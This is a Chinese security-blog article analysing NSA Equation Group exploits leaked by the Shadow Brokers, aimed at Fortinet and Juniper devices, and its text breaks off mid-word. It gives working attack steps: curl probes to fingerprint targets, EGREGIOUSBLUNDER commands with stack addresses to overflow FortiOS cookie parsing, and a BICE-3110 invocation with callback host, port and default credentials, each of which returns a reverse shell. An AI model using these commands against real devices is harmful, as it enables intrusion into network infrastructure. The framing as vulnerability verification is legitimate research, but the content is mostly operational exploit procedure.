NSA（美国国安局）泄漏Exploit分析

*本文原创作者：tigerlab，本文属FreeBuf原创奖励计划，未经许可禁止转载

2016年8月16日，黑客团伙“The Shadow Brokers”声称自己入侵了“Equation Group“（方程式组织），并将他们从该黑客组织的计算机系统中所获取到的部分黑客工具泄漏在了互联网上。

泰格实验室第一时间对此次泄露的文件进行了深入分析，多数漏洞的验证分析情况已有同行分享，现将我们对另外三个未见分析的漏洞的验证分析分享给大家，其中包括fortinet、juniper、Cisco三种设备漏洞。

1、fortinet漏洞验证

该漏洞主要是Cookie解析器存在缓冲区溢出漏洞，远程攻击者可通过发送特制的HTTP请求利用该漏洞执行任意代码。

CVE编号：CVE-2016-6909

以下版本受到影响：

Fortinet FortiOS 4.1.11之前的4.x版本， 4.2.13之前的4.2.x版本， 4.3.9之前的4.3.x版本， FortiSwitch 3.4.3之前的版本。

漏洞验证过程如下：

获取目标etag 判断版本类型

curl -X HEAD –v http://xxx.xxx.xxx.xxx/

Etag:480d772a

如果etag小于4DXXXXXX，适用版本 3；

如果etag 大于 4DXXXXXX,判断是否需要cookienum

curl -X HEAD  –v   http://xxx.xxx.xxx.xxx/login

APSCOOKIE=0&0 ，在执行命令时不需要设置cookienum

APSCOOKIE_2930800995=0&0 ，在执行命令时需要设置cookienum,且版本为4nc

测试etag小于4DXXXXXX，且不存在cookienum

1）获取溢出地址

判断etag是否在存在于配置文件EGBL.config中,例:

如不存在可通过以下命令获取堆栈地址：

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx-p 80 -l 5432 –ssl 0 -v –config ./EGBL.config –wam 10

该命令只适用于etag小于4DXXXXXX，且不存在cookienum，在其他版本中均失效，无法获取堆栈地址。

命令执行如下：

成功获取堆栈地址 0Xbffff274

2）执行shellcode，返回shell

可通过直接传入stack堆栈地址来反弹shell，

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v --stack 0xbffff274  --nopen --gen 3

也可将etag写入配置文件

ETAG = 480d772a : 0xbffff274

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v –etag 480d772a --nopen --gen 3 --config ./EGBL.config

已成功返回shell，执行-ls命令获取文件目录信息。

本次测试主要低版本的飞塔设备，etag小于4DXXXXXX。由于未深入该漏洞exploit溢出过程，所以针对其他版本无法通过命令获取stack的，通过配置文件中的内存地址遍历进行了测试，也可以成功反弹shell。

2、juniper漏洞验证

该漏洞需要先获得juniper设备口令，在根据设备版本型号进行攻击，获取系统权限。

telnet登陆获取设备版本信息

设备版本号是ssg5ssg20.6.1.0r2.0，查看Dats里面是否存在该设备文件

漏洞复现

在BARGLEE文件夹中BICE-3110是juniper漏洞利用程序

./BICE-3110 -R *.*.*.* //目标ip -D 127.0.0.1 //接收反弹shell 主机ip -d 5555 //接收反弹shell 主机端口 -m telnet //登陆模式 ssh/telnet -t ../..//Dats/ssg5ssg20.6.1.0r2.0.xml //攻击代码配置 -u netscreen //设备账号 -p netscreen //设备口令

成功之后返回设备基本信息，可选择2种shell权限，juniper交互shell及BI shel